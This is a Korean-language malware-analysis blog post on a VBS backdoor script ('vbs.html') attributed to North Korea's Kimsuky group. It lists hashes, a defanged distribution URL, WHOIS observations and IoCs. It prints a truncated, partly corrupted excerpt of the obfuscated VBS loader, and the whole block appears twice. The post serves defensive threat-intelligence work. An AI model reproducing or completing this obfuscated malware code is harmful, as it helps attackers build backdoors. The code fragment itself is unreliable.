북한 김수키(Kimsuky)에서 만든 악성 백도어 VBS 스크립트-vbs.html(2025.3.16)
Contents
오늘은 북한 김수키(Kimsuky)에서 만든 악성 백도어 VBS 스크립트 인 vbs.html(2025.3.16)에 대해 알아보겠습니다. 해당 악성 VBS 스크립트는 다음 악성 URL을 통해서 유포되었습니다.
파일명:vbs.html
사이즈:1 MB
MD5:a6598bbdc947286c84f951289d14425c
SHA-1:07c7cf4441254e8754aa62150bf8c5365c3825f4
SHA-256:5f23b1ca43f6a18e3c9f21d390f5d1e187b1339b07a1dce70f8338f3be320878
hxxp://mrasis(.)n-e(.)kr
입니다.
해당 사이트는 도메인의 WHOIS 정보는 러시아에서는 Garant-G Ltd 미국에서는 EDGECAST에 등록되어 있음을 나타내며 이는 합법적인 한국 도메인에서는 이례적입니다.
VBS 코드
<html>
<script language="VB?/cript">
On Error Resume Next
'@ @
owseueyc = "zewxpowjcezzopor": vhhpwsrl = "rxcnlsf(b)dozuv??pck": epf(o)dxdo =
"byclvoyd(c)kpkrkbzxnhb": sfkisxuv = "ktykezlnwooozcdouo": ziiinncw = "psfyl??
lbzmugtvxhfktpu": akzebgop = "upmvkjc(p)gkjsxcntyg": aaihzoot = "akkozjhef(b)hi
uvbug": krcewgcv = "zydpjeodpqkpd??tx(z)j": Private Function ikwcpd
ah(ByVal vhao): xlskocwd = "xjvrvnxiqvggukpm": vhayzldd = "iwzxixzljbzjqvnjphvf
ik("): evfjrglh = "vwptzvxhqiowkxnz": zujsxrvo = "pfyhlcffboftmjqntxiy": akthadvj = "otwczddkzahhxiopv": urhxyupd = "qtplliqdkoenpdgbuvhh(e)dqg": jewoldla = "yhvmgctdgcdwfglgqs": uwyfkdvf = "uwplezu??uzqpslyrfvkt": for g = 1 To Len(vhao) Step 2: ikqrxoyk = "qumdoekbg(u)hjrvthm": fkbxfptr = "apuhjvmizorkhdyanb": znyyhlgr = "w?????????????? = "ysxlqlwrfi???ctjp": nomukbbl = "fwaxyqwfiqcbuiyknetiyfle": wvpqibrc = "oexzbtloztsisxyxqllxxkx": miegozwi = "nkppukjvnjtblyud???my": givrhlso = "idmjvfqgedkcxpirgs": iohxhyhb = "znnzhptwcsyobeszpoj": End Function: dntwgsen = "urisjmuxnwmzyvry": qbuopnbo = "oecbsybzfnlzrtgflxgz": bzbrfeit = "rsahttqakwybzwuffnmxak": eqxlsnsq = "xkwxocozt???jehvhvu": bhkdkrfj = "qqwwlspktb???wr": aluayrnx = "gekchmtzzorhdijt": rwogaxts …
파일명:vbs.html
사이즈:1 MB
MD5:a6598bbdc947286c84f951289d14425c
SHA-1:07c7cf4441254e8754aa62150bf8c5365c3825f4
SHA-256:5f23b1ca43f6a18e3c9f21d390f5d1e187b1339b07a1dce70f8338f3be320878
hxxp://mrasis(.)n-e(.)kr
입니다.
해당 사이트는 도메인의 WHOIS 정보는 러시아에서는 Garant-G Ltd 미국에서는 EDGECAST에 등록되어 있음을 나타내며 이는 합법적인 한국 도메인에서는 이례적입니다.
VBS 코드
<html>
<script language="VB?/cript">
On Error Resume Next
'@ @
owseueyc = "zewxpowjcezzopor": vhhpwsrl = "rxcnlsf(b)dozuv??pck": epf(o)dxdo =
"byclvoyd(c)kpkrkbzxnhb": sfkisxuv = "ktykezlnwooozcdouo": ziiinncw = "psfyl??
lbzmugtvxhfktpu": akzebgop = "upmvkjc(p)gkjsxcntyg": aaihzoot = "akkozjhef(b)hi
uvbug": krcewgcv = "zydpjeodpqkpd??tx(z)j": Private Function ikwcpd
ah(ByVal vhao): xlskocwd = "xjvrvnxiqvggukpm": vhayzldd = "iwzxixzljbzjqvnjphvf
ik("): evfjrglh = "vwptzvxhqiowkxnz": zujsxrvo = "pfyhlcffboftmjqntxiy": akthadvj = "otwczddkzahhxiopv": urhxyupd = "qtplliqdkoenpdgbuvhh(e)dqg": jewoldla = "yhvmgctdgcdwfglgqs": uwyfkdvf = "uwplezu??uzqpslyrfvkt": for g = 1 To Len(vhao) Step 2: ikqrxoyk = "qumdoekbg(u)hjrvthm": fkbxfptr = "apuhjvmizorkhdyanb": znyyhlgr = "w?????????????? = "ysxlqlwrfi???ctjp": nomukbbl = "fwaxyqwfiqcbuiyknetiyfle": wvpqibrc = "oexzbtloztsisxyxqllxxkx": miegozwi = "nkppukjvnjtblyud???my": givrhlso = "idmjvfqgedkcxpirgs": iohxhyhb = "znnzhptwcsyobeszpoj": End Function: dntwgsen = "urisjmuxnwmzyvry": qbuopnbo = "oecbsybzfnlzrtgflxgz": bzbrfeit = "rsahttqakwybzwuffnmxak": eqxlsnsq = "xkwxocozt???jehvhvu": bhkdkrfj = "qqwwlspktb???wr": aluayrnx = "gekchmtzzorhdijt": rwogaxts …
IoC
a6598bbdc947286c84f951289d14425c
5f23b1ca43f6a18e3c9f21d390f5d1e187b1339b07a1dce70f8338f3be320878
07c7cf4441254e8754aa62150bf8c5365c3825f4
5f23b1ca43f6a18e3c9f21d390f5d1e187b1339b07a1dce70f8338f3be320878
07c7cf4441254e8754aa62150bf8c5365c3825f4